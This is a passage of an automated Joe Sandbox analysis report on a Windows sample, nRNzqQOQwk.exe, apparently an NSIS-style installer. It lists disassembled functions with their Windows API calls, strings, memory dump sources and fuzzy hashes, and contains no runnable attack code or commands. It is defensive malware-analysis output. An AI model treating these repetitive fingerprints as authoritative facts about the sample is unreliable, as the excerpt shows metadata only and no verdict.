                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F$Pongids Setup
                                                                            • API String ID: 941294808-3581732227
                                                                            • Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                            • Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
                                                                            • Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                            • Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                            Function 00405AE9 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405C7C,?,?), ref: 00405AF8
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C7C,?,?), ref: 00405B1C
                                                                            • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405B25
                                                                              • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                                              • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                                            • GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405B42
                                                                            • wsprintfA.USER32 ref: 00405B60
                                                                            • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B9B
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405BAA
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                            • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C38
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405C49
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C50
                                                                              • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 00405A17
                                                                              • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                            • API String ID: 222337774-4148678300
                                                                            • Opcode ID: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                            • Instruction ID: 1eed59494e777df17b5db6228b66ba1829f219dd2eba3e9b173e6ae731b9f24b
                                                                            • Opcode Fuzzy Hash: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                            • Instruction Fuzzy Hash: 503125B0A08B05ABE6203B615D48F6B3A5CDF45794F14053BFE01F62D2DA7CAC408EAD
                                                                            Function 00402C13 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
                                                                            • MulDiv.KERNEL32(00095409,00000064,00096960), ref: 00402C59
                                                                            • wsprintfA.USER32 ref: 00402C69
                                                                            • SetWindowTextA.USER32(?,?), ref: 00402C79
                                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: T$`i$verifying installer: %d%%
                                                                            • API String ID: 1451636040-1135715120
                                                                            • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                            • Instruction ID: 21607a1dc9e24acd8111b7ab95824f47c5a1c8f1a2671c4e1062bfa223269d08
                                                                            • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                            • Instruction Fuzzy Hash: 8B014F70944209FBEF209F60DD4AEAE37A9AB04304F008039FA16A92D0D7B89951CB59
                                                                            Function 0040600B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\nRNzqQOQwk.exe",765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\nRNzqQOQwk.exe",765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                                            • CharPrevA.USER32(?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040600C
                                                                            • *?|<>/":, xrefs: 00406053
                                                                            • "C:\Users\user\Desktop\nRNzqQOQwk.exe", xrefs: 00406047
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-16102510
                                                                            • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                            • Instruction ID: 5800177166b7667d3eaf53a22357e4554d28550b3292ec339307e94a63baae70
                                                                            • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                            • Instruction Fuzzy Hash: 5011276184479129FB3296384C00B7B6FD94F567A0F19007BE9C6722C2C67C5C62836D
                                                                            Function 00403FEC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongA.USER32(?,000000EB), ref: 00404009
                                                                            • GetSysColor.USER32(00000000), ref: 00404025
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404031
                                                                            • SetBkMode.GDI32(?,?), ref: 0040403D
                                                                            • GetSysColor.USER32(?), ref: 00404050
                                                                            • SetBkColor.GDI32(?,?), ref: 00404060
                                                                            • DeleteObject.GDI32(?), ref: 0040407A
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404084
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                            • Instruction ID: c3620b6f473fad47e7a0c0791398936244beda297bc66feae6272bbc27e0e58c
                                                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                            • Instruction Fuzzy Hash: D7214FB1904704ABCB319F78DD48B5BBBF8AF41714F048A29EB96B22E0D734E944CB55
                                                                            Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                              • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                            • String ID:
                                                                            • API String ID: 3730416702-0
                                                                            • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                            • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                            • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                            • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                            Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                            • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                            • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                            • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                            • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                            Function 00404FB9 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                            • lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                            • lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,765F23A0), ref: 00405015
                                                                            • SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2531174081-0
                                                                            • Opcode ID: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                            • Instruction ID: d1dd411a73e10bc413e7a6ba64919406d2bbbb657998d141ba589d50d7388124
                                                                            • Opcode Fuzzy Hash: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                            • Instruction Fuzzy Hash: 0D214C71900519AADF119FA5DD849DEBFA9EF09354F14807AF944A6290C7398D40CFA8
                                                                            Function 00404884 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040489F
                                                                            • GetMessagePos.USER32 ref: 004048A7
                                                                            • ScreenToClient.USER32(?,?), ref: 004048C1
                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048D3
                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004048F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                            • Instruction ID: 53a3bc3e7d347c8b02fcccb5944648bd46d0fd351ff65b71f1969629af7e9ac2
                                                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                            • Instruction Fuzzy Hash: 12019275D00219BAEB00DBA5DC41BFEBBBCAF55711F10412BBA00B71D0C7B469018BA5
                                                                            Function 00402749 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00030000,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                                                            • GlobalFree.KERNEL32(?), ref: 004027F2
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402805
                                                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                                            • Instruction ID: ecef423f8b7fb5116dd0415946ee68b484c5f893cd0af9153c7a5222f957d578
                                                                            • Opcode Fuzzy Hash: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                                            • Instruction Fuzzy Hash: B921AE71C00128BBCF216FA5CE49D9E7E79EF09324F14423AF511762D0C6794D419FA9
                                                                            Function 0040477A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
